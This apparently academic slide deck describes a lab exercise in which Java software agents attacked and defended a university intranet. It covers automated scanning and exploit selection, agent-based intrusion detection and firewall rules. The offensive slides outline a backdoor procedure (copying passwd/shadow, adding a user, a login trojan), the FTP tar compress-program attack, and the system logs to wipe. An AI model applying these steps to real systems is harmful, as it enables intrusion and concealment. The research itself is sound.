AgentBased Attack and Defense for an Intranet Environment

1
Agent-Based Attack and Defense foran Intranet
Environment

• Dr. Yuh-Jong Hu
• Tsai Chang-hsien, and Pan Hsien-kuo
• jong, s8514, s8552_at_cherry.cs.nccu.edu.tw
• Emerging Network Technology(ENT) Lab
• Dept. of Computer Science
• National Chengchi University, Taipei, Taiwan

2
Software Agent Definitions

• An agent is a computer system, situated in some
  environment, that is capable of flexible
  autonomous action in order to meet its design
  objectives(1).
• Three key concepts in this definition
  situatedness, autonomy, and flexibility.
• Software agent can be classified as stationary
  agent and mobile agent
• Mobile agent security concerns are hosts
  protection, agents protection, and agent
  trustworthiness, while stationary agent security
  concern is agent trustworthiness.

3
Definitions of Information Warfare

• Information warfare consists of those actions
  intended to protect, exploit, corrupt, deny, or
  destroy information or information resources in
  order to achieve a significant advantage,
  objective, or victory over an adversary(17).
• Information warfare can be dichotomized
  as(5)(6)
• Offensive Information Warfare
• Defensive Information Warfare
• Offensive and defensive information warfare is
  considered as a primal and dual problem.

4
Definitions of Information Warfare(Conti.)

• Offensive information warfare operations produce
  a win-lose outcome by altering the availability
  and integrity of information resources to the
  benefits of the offensive and to the detriment of
  defensive(5).
• Defensive information warfare seeks to protect
  information resources from attack, to preserve
  the value of resources, or in the event of a
  successful attack, recover lost value(5).

5
Internet vs. Intranet Information Warfare

• An Intranet information warfare was exercised in
  a protection network domain with firewall as a
  gatekeeper.
• The domain for Internet information warfare is
  larger than simple Intranet warfare subdomain so
  to simulate an Internet warfare is much harder.
• Internet information warfare is advantage to
  offensive side due to the widespread of defensive
  weakness area.

6
Why Agent-Based Information Warfare?

• Pure manual-based information warfare operations
  are cumbersome, tedious, and the attack and
  defense strategies are not easy to formulate.
• Agent-based information warfare provides
  autonomous, proactive, reactive, and cooperative
  attack/defense operations.
• Attack/defense strategies are easy to formulate
  and the attack/defense operations initiative is
  transparent.
• Agent-based information warfare does not exclude
  manual-based attack/defense.

7
How Agent-Based Information Warfare?

• Some of software agents characteristics, such
  as situatedness, autonomy, and flexibility(respons
  ive, pro-active, social) are demonstrated in
  agent-based offensive and defensive information
  warfare.
• Agents are classified into several categories to
  play their specific missions in our
  offensive/defensive information warfare.
• Some of existing manual operation codes to
  exploit system vulnerability are reused in our
  agent-based offensive, including scanner, remote
  exploit, local exploit, and monitoring tools,
  etc.

8
How Agent-Based Information Warfare?(Conti)

• All of our offensive/defensive agents are codes
  in Java, so we must handle the integration
  problems between Java and other existing
  intrusion tools.
• Offensive and defensive information warfare were
  developed by two different groups and the warfare
  were lasted for 5 days in our ENT labs Intranet.
• The initiative of agent-based
  offensive/defensive information warfare can be
  taken be anyone, who did not have too much
  cyberspace attack and defense knowledge.
• We expect to increase the power of attack/defense
  via agent technology.

9
(No Transcript)
10
Information Warfare Win-Lose Criteria

• Offensive group and defensive group discussed
  the project together but implemented the system
  separately.
• The advantage to the offensive group is the
  familiarity of our Intranet environment without
  too much further probing activities.
• The advantage to the defensive group is the
  protection of firewall with flexible security
  policies adjustment.
• In general, there are several win-lose criteria
  to evaluate the offensive and defensive warfare
  achievements.
• We did not consider social engineering
  attack/defense issues via our agent-based system.

11
Information Warfare Win-Lose Criteria(Conti.)

• Win-lose criteria for offensive group to
  achieve the following attacks successfully
• denial of service attack
• data integrity attack
• data confidentiality attack
• end-user general permission attack
• root privileged permission vulnerability
  attack

12
Information Warfare Win-Lose Criteria(Conti.)

• Win-lose criteria for defensive group to
  achieve the following defenses successfully
• timely detect all kinds of attacks
• accurately decide the attack category
• properly react to the anomalous intrusion
• effectively recover from the successful
  attack
• cooperate with firewall to counter similar
  attacks

13
Agent-Based Offensive Information Warfare

• Scanning, remote exploiting, local exploiting,
  monitoring, and stealth are all exercised via
  software agents(1).
• Offensive software agents are classified as
  scanning agent, master agent, attack agent, and
  repository agent.
• Scanning agent is embedded with Nessus probing
  tools.
• Master agent is the decision maker to launch the
  right exploit codes based on scanning agents
  probing results.
• Attack agent loads the right exploit codes to
  attack.
• Repository agent stores and classifies different
  exploit codes for future possible attacks.

14
Agent-Based Offensive Information Warfare(Conti.)

• Offensive procedures are
• (1) Master agent submits targets(IP) to scanning
  agent.
• (2) Scanning agents probe targets information.
• (3) Scanning agents return information to master
  agent.
• (4) Master agent analyze information and decide
  the suitable attack policies and mechanisms.
• (5) Master agent fires the attack actions and the
  attack agents do the real attack.
• (6) If root account was obtained, agent will
  clean the log files and set up backdoor for
  future similar attacks.

15
Master Agent GUI
16
Tools and Techniques for Agent-Based Offensive
Information Warfare

• Nessus scanning tools
• Java socket
• JNI(Java Native Interface)
• Rootkit
• Loki2
• Crack
• Satan
• Back Orifice

17
Java Native Interface
Exploit Code Database
Attack Agent
JNI
Attacking
18
JNI implement

• For example, the exploit code is written by C .
• (1)Writing a java function to load exploit code.
• (2)Using javah to create .h file from the java
  class.
• (3)Include the .h file in exploit code.
• (4)Using JNI in the exploit code to transfer
  parameters.
• (5)Compiling this exploit code to a new library.

19
Agent Communication Interfaces
Detect Scan
Analyze
Attack
Parse
Master Agent
Repository Agent
Attack Tools
Detect Agent
Log Agent
Attack Agent
Attack tools
Generator Agent
JNI
Repository Agent
Repository Agent
20
Attack Methods

• Sniffer
• FTP Conversions Attack
• Userhelper and PAM Vulnerabiliy
• Backdooring
• Log Cleaning

21
FTP Conversion Attack

• A user can convert/archive/compress data on the
  fly when retrieving files from a FTP server.
• Request a filename and appends .tar/.tar.gz/.Z/.gz
  to the filename
• Tar arguments
• --use-compress-program PROG

22
Backdooring

• Backing up passwd/shadow files
• Adding a temp user
• Getting your login trojan
• Install login trojan
• Being smart

23
Log Cleaning

• /etc/syslog.conf
• /var/log/messages
• /var/log/secure (TCP Wrapper log)
• /var/log/xferlog
• /var/log/wtmp
• /.bash_history

24
Agent-Based Defensive Information Warfare

• Intrusion detection, attack recognition and
  reaction, counter attacks and damage recovery
  are all operated via software agents.
• Defensive software agents are based on
  client-server model with client side as
  responsive agents and server side as supervisor
  agent.
• Responsive agent is composed of agent manager,
  security manager, and a group of Java agent
  entities.
• Supervisor agent is composed of alert manager,
  decision manager, agent register, and host
  display.

25
Agent-Based Defensive Information Warfare(Conti.)

• Responsive agents are responsible for the timely
  detecting all kinds of intrusion so they are
  distributed over the entire Intranets hosts.
• Supervisor agent accurately decides the
  intrusion category and properly react to the
  anomalous intrusion.
• Supervisor agent with responsive agents must
  effectively recovers from the successful attack.
• Supervisor agent and a group of responsive agents
  cooperate with firewall to counter any kinds of
  attack.

26
(No Transcript)
27
(No Transcript)
28
Server
Defensive Steps
Supervisor Agent
Alert Manager
Host Display
10
9
Decision Manager
4
3
8
Responsive Agent
Agent Manager
5
2
7
Agent entity
Agent entity
Agent entity
1
6
Services
Client
29
(No Transcript)
30
(No Transcript)
31
Supervisor GUI
32
Supervisor GUI
33
Tools and Techniques for Agent-Based Defensive
Information Warfare

• Check Point FireWall-I
• Apache Web Server
• War-FTP
• Sniffer
• Java programming language
• Scanner for detecting Internal Intranet/hosts
  weakness
• Log files analyzer for
• system status report
• network status report
• network services report

34
FireWall Authentication

• Use client authentication and user authentication
  to protect TELNET and FTP services.
• After successful client authentication, we allow
  connections from a specific IP address.
• When a rule was specified for user
  authentication, the corresponding FireWall-I
  security server is invoked to mediate the
  associated connections.

35
Agent-Based Defensive Rule

• When agent entity detects denial of Telnet and
  FTP services, supervisor agent bans the
  initiative attacks IP.
• When agent entity detects mail bomb, supervisor
  agent bans the initiative attacks IP.
• When agent entity detects denial of HTTP
  services, supervisor agent alerts system
  administrator.
• Agent entity checks the services that FireWall-1
  allows, and reports whether the services are
  still alive.

36
Agent-Based Offensive Information Warfare vs.
Firewall Services

• Agent-based offensive information warfare must
  adjust its attack strategy to different level of
  firewall services.
• Configure firewall network services allows us
  to simulate the attacks under different tightness
  level of network security policy and mechanism.
• The tightest control of firewalls network
  services might reduce a lot of outside attack
  events but it also reduces the network services
  availability and flexibility.

37
Agent-Based Defensive Information Warfare vs.
Firewall Services

• Agent-based defensive information warfare aims at
  handling intrusion detection so it must
  cooperate with firewalls intrusion prevention.
• Ideally, defense agents must dynamically adjust
  different level of firewall services based on
  system, network status, and end-user services
  request.
• Awareness of different level of firewall services
  can reduce a lot of efforts to analyze the
  system/network log files.

38
Downgrade Firewall Services for Different Phases
of Warfare

• The information warfare was lasted for 5 days and
  the FireWall-1 service policies were downgraded
  gradually to simulate the real world Internet
  security protection level.
• Day 1 smtp, ftp, http, telnet
• Day 2 default
• Day 3 gopher, pop-3, tftp, who
• Day 4 dns, echo, nntp, ntp-tcp
• Day 5 all

39
Fictitious Auction Server for Mobile Agent
Services(Not Done Yet

• An fictitious auction server is going to set up
  within the Intranet to provide mobile agents to
  bid the auction items.
• In general, firewall does not provide mobile
  agents (code) authentication and authorization
  so auction server must handle this issue by
  itself.
• Flexibility and security are always in conflict.
  Mobile agent provides flexibility bidding
  services but it reduces the Intranet security.
• The popularity of Java code makes the possibility
  of providing mobile code services within the
  Intranet.

40
Mobile Agent Security Issues

• Mobile agent(code) security is an emerging
  research problem because of the attractive of
  mobile agent services and the popularity of Java
  mobile code.
• Hosts(network) protection, agents protection, and
  agents trustworthiness are the major research
  issues.
• Hosts(network) protection is a traditional
  problem except the relaxation of adoption foreign
  codes constraints.
• Agents protection is a hard problem.
• Agents trustworthiness is handled via agent
  authentication and authorization.

41
Mobile Agent Authentication and Authorization

• Java 2 provides some basic authentication and
  authorization mechanisms but not enough.
• Existing X.509 authentication services framework
  might not general and robust enough to handle
  mobile agent authentication and authorization
  problem.
• We need a distributed trust management framework,
  which allow us to generate a lot of mobile agents
  that can be verified and granted access rights
  dynamically.
• The mobile agent system engines must set up for
  each platform before the Intranet can provide
  mobile code services.

42
Conclusion

• Offensive and defensive information warfare must
  consider together in order to realize the attack
  and defense strategy in an optimal manner so we
  consider this is a primal and dual problem.
• What software agent characteristics can be shown
  in the agent-based information warfare to enhance
  our attack or defense power is the primary reason
  for us to adopt agent technology.
• We did not know the power of agent-based
  information warfare for Internet and for social
  engineering attack and defense.

43
References

• (1)Boulanger, A., Catapults and grappling hooks
  The tools and techniques of information warfare.
  IBM System Journal, 37(1), 1998, 106-114.
• (2)Cohen, Fred, Information System Attacks A
  Preliminary Classification Scheme. Computers
  Security, 16(1997), 29-46.
• (3)Cohen, Fred, Information Systems Defences A
  Preliminary Classification Scheme. Computers
  Security, 16(1997), 94-114.

44
References(Conti.)

• (4)Crosbie, M. and Spafford, G., Defending a
  Computer System using Autonomous Agents
  http//www.cs.purdue.edu/coast/projects/autonomous
  -agents.html
• (5)Denning, E. Dorothy, Information Warfare and
  Security. Addison-Wesley, 1999.
• (6)Dorothy, E. Denning, Cyberspace Attacks and
  Countermeasures. Internet Besieged Countering
  Cyberspace Scofflaws. AW, 1998.

45
References(Conti.)

• (7)Farmer, D. and Venema, W., Improving the
  Security of Your Site by Breaking Into it.
  http//www.epm.ornl.gov/dunigan/cracking.html(8)F
  armer, D. and Venema, W., SATAN-Security Analysis
  Tool for Auditing Networks.
• (9)Farmer, D. and Spafford, E. The COPS Security
  Checker System. Proceedings of Summer USENIX
  Conference, 1990, 165-170.
• (10)Forrest, S., Hofmeyer, A. S., and Somayaji,
  A., Computer Immunology. CACM, 40(10), Oct. 1997.

46
References(Conti.)

• (11)Greenberg, S. M., Byington, J. C., and
  Harper, D. G., Mobile Agents and Security, IEEE
  Communications Magazine, July 1998.
• (12)Jennings, R. N., Sycara, K., Wooldridge, M.,
  A Roadmap of Agent Research and Development.
  Autonomous Agents and Multi-Agent Systems, 1,
  7-38, 1998.
• (13)Mukherjee, B., Heberlein, L. T., and Levitt,
  K. N., Network Intrusion Detection. IEEE Network,
  8(3), 26-41, May/June, 1994.
• (14)The Nessus Project, http//www.nessus.org.

47
References(Conti.)

• (15)Paller, A., SHADOW(SANSs Heuristic Analysis
  for Defensive Online Warfare), SANS Institute,
  http//www.sans.org.
• (16)Porras, A. P., Neumann, P. G., EMERALD Event
  Monitoring Enabling Responses to Anomalous Live
  Disturbances, 1997 National Information Systems
  Security Conference, http//www.csl.sri.com/intrus
  ion.html.
• (17)Schwartau, Winn, Information Warfare, 2nd
  Edition, Thunders Mouth Press, 1996, p. 12.
• (18)Thorn, T., Programming Languages for Mobile
  Code. ACM Computing Surveys, 29(3), Sep. 1997.